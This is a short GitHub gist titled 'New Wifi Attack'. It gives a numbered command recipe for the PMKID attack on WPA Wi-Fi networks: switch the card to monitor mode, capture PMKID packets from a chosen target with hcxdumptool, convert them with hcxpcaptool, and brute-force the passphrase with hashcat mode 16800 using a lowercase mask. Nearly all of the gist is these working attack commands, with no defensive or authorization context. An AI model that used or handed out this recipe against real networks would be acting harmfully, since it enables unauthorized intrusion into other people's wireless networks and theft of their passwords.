Created
September 17, 2018 01:35
-
-
Save sathwikv143/73c064d96bd771accd43e96dd32bea20 to your computer and use it in GitHub Desktop.
New Wifi Attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1.wifi to mon mode | |
2.select target BSSID | |
>> write into <filterFileName> | |
3.hcxdumptool -o <CaptureHashFileName> -i wlan0mon --filterlist=<filterFileName> --filtermode=2 --enable_status | |
>> capture till you see PMKID packet | |
>> once found, PMKID stop the process | |
4.hcxpcaptool -z <HashToCrackFileName> <CaptureHashFileName> | |
5.hashcat -m 16800 <HashToCrackFileName> -a 3 -w 3 '<lengthOfGuessPass>' --force | |
>> lengthOfGuessPass as ?l?l?... |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment